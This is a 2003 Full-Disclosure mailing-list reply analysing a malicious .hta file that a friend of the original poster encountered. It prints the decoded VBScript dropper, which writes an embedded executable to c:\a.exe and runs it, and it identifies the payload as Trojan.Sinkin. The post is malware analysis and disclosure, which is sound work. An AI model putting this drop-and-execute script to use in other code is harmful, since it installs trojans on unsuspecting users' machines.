[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] .hta virus analysys
- To: Jim Duggan <on_a_thousand@hotmail.com>, full-disclosure@lists.netsys.com
- Subject: Re: [Full-Disclosure] .hta virus analysys
- From: Jelmer <jkuperus@planet.nl>
- Date: Thu, 20 Nov 2003 12:52:30 +0100
.hta files is a proprietary concept, and only works in conjunction with
Internet Explorer (specifically version 5 and above). basicly its much like a
.html except it has no security restrictions
there are 2 things being encoded in the script you send
an executable in a string called m
and a piece of vbscript code in a string called c
they seem to be encoded to trick virusscanners into letting them pass
decoding the vbscript code we get
<script language="VBScript">
Dim fs, dr, f
Set fs = CreateObject("Scripting.FileSystemObject")
f = "c:\a.exe"
Set dr = fs.CreateTextFile(f, True)
dr.Writeline m
dr.close
Set shell=CreateObject("WScript.Shell")
shell.run(f)
self.close
</SCRIPT>
which basicly says, get the embedded .exe file store it in c:\a.exe then
execute it
the exe being dropped is identified by norton as being Trojan.Sinkin
<quote>
Trojan.Sinkin is a Trojan Horse that changes the Internet Explorer start and
search pages, and sends
AOL Instant Messenger information to a remote host.
This Trojan may also display advertisements when the user is browsing the Web
</quote>
now you know
----- Original Message -----
From: Jim Duggan
To: full-disclosure@lists.netsys.com
Sent: Thursday, November 20, 2003 2:31 AM
Subject: [Full-Disclosure] .hta virus analysys
A friend contracted this .hta that seems to edit your profile with a link to
itself, http://www.talkstocks.net/
attached is the hta file it attempts to run. Its looks to be encoded, which is
something i dont know much about but im sure most people on this list will have
no problem reading it, just wondering what it does.
Any help appreciated
Thx
Jason